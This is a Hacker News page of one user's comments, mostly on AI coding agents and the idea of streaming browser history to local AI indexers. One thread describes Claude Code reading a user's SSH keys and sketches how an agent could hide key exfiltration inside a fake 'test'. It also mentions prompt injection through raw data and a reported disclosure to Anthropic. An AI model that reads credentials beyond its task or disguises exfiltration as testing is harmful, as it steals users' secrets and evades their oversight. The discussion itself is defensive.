Hacker Newsnew | past | comments | ask | show | jobs | submit | espeed's commentslogin

Such as Claude Code reading your ssh keys. Hiding the file names masks the vulnerability.


That's approaching the problem from the worst possible angle. If your security depends on you catching 1 message in a sea of output and quickly rotating the credential everywhere before someone has a chance to abuse it then you were never secure to begin with.

Not just because it requires constant attention which will eventually lapse, but because the agent has an unlimited number of ways to exfiltrate the key, for example it can pretend to write and run a "test" which reads your key, sends it to the attacker and you'll have no idea it's happening.


I sent email to Anthropic (usersafety@anthropic.com, disclosure@anthropic.com) on January 8, 2025 alerting them to this issue: Claude Code Exploit: Claude Code Becomes an Unwitting Executor. If I hadn't seen Claude Code read my ssh file, I wouldn't have known the extent of the issue.


To improve the Claude model, it seems to me that any time Claude Code is working with data, the first step should be to use tools like genson (https://github.com/wolverdude/GenSON) to extract the data model and then create why files (metadata files) for data. Claude Code seems eager to use the /tmp space so even if the end user doesn't care, Claude Code could do this internally for best results. It would save tokens. If genson is reading the GBs of data, then claude doesn't have to. And further, reading the raw data is a path to prompt injection. Let genson read the data, and claude work on the metadata.


Correction: January 8, 2026


I agree with you but I think there's a "defense in depth" angle to this. Yes, your security shouldn't depend on noticing which files Claude has read, since you'll mess up. But hiding the information means your guaranteed to never notice! It's good for the user to have signals that something might be going wrong.


There's no defense "in depth" here, it's like putting your SSH key in your public webroot and watching the logs to see if anyone's taken your key. That's your only layer of "defense" and you don't stand any chance of enforcing it. Real defense is rooted in technical measures, imperfect as they may be, but this is just defense through wishful thinking.


Obviously, don't put your SSH keys in a public webroot. But let's say you're managing a web server and have a decent security mindset. But don't you think it's better to regularly check the logs for evidence of an attack vs delete all the logs so they can't be checked?


Why does it have access to those paths?


Have we entered the age of AI programming people?


Rather than develop its own AI (https://news.ycombinator.com/item?id=45926779), Firefox should develop a system to pipe your html rendered browsing history in real time so external local services can process it (https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...). See https://news.ycombinator.com/item?id=45743918

Firefox probably won't suddenly have the best AI, but it could be the only browser that does this. Previous: https://news.ycombinator.com/item?id=46018789


Someone needs to convince Firefox rather than develop its own AI (https://news.ycombinator.com/item?id=45926779) to develop a system to pipe your html rendered browsing history in real time so external local services can process it (https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...). See https://news.ycombinator.com/item?id=45743918

Firefox probably won't suddenly have the best AI, but they could have the only browser that does this.


You can already do what you're looking for by reading the browser cache as new data is cached. This would allow you to see the site as it was loaded originally, instead of simply fetching an updated view from a URL. The data layout for the cache in Firefox and Chrome is available online.


Does the cache store the rendered DOM?


They'd probably reject that idea under some bullshit privacy or security excuse Wayland-like reasoning. Also why we don't have XUL extensions anymore and why they'll eventually copy chrome on that manifest crap.


I paid for Gemini Pro. Am I getting Gemini 3 Pro (https://gemini.google.com)? "To be precise: You are currently interacting with Gemini 1.5 Pro." https://x.com/espeed/status/1991333475098718601



Knowing this is the direction things were headed, I have been trying to get Firefox and Google to create a feature that archives your browser history and pipes a stream of it in real time so that open-source personal AI engines can ingest it and index it.

https://connect.mozilla.org/t5/ideas/archive-your-browser-hi...


AFAICS this has nothing to do with "open-source personal AI engines".

The recorded history is stored in a SQLite database and is quite trivial to examine[0][1]. A simple script could extract the information and feed them to your indexer of choice. Developing such a script isn't the task for an internet browser engineering team.

The question remains whether the indexer would really benefit from real-time ingestion while browsing.

[0] Firefox: https://www.foxtonforensics.com/browser-history-examiner/fir...

[1] Chrome: https://www.foxtonforensics.com/browser-history-examiner/chr...


Due to the dynamic nature of the Web, URLs don't map to what you've seen. If I visit a URL at a certain time, the content I see is different than the content you see or even if I visit the same URL later. For example, if we want to know the tweets I'm seeing are the same as the tweets you're seeing and haven't been subtly modified by an AI, how do you do that? In the age of AI programming people, this will be important.


I'm confused, do you want more than the browser history then? ...something like Microsoft's Recall? Browsers currently don't store what they've seen and for good reasons. I was with you for a sec, but good luck convincing Mozilla to propagate rendered pages to other processes then!


Being able to index and own your data changes the model of the Web.


So you're one of those people trying to attach history to everything!

Yeah I am sure lots of people want their pornhub history integrated into AI...

If that is the "future" (gag), we better be able to opt out


It's your personal AI running locally on your machine, you can opt out of what you index. You own your data.


Why not Chrome Devtools MCP?


I understand GP like they want to browse normally and have that session's history feed into another indexing process via some IPC like D-Bus. It's meant to receive human events from the browser.

Chrome Devtools MCP on the other hand is a browser automation tool. Its purpose is to make it trivial to send programmed events/event-flows to a browser session.


The universities need to get together and develop their own open-source search engine as part of an ongoing research project. It should be hosted in a distributed fashion from the universities themselves. They have the expertise and the resources these days to do it. And much of the high quality content on the public web originates from the universities anyway. It will be like the Library of Alexandria and not subject to censorship.


There needs to be a browser that archives your browser history and pipes a stream of it in real time so that open-source personal AI engines can ingest it and index it. The future of the Web will be built on this. Google may not do it. Firefox could.


Knuth's ChatGPT Experiment Insights https://gemini.google.com/share/3768c883b67c



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: